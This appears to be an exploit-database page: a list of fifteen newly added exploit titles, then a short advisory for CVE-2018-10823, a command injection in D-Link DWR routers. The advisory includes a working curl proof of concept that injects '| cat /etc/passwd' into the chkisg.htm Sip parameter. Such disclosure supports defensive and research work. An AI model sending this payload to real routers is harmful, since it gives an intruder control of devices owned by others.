dac8dd4731
15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
735 B
735 B
Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
See the passwd file contents in the response.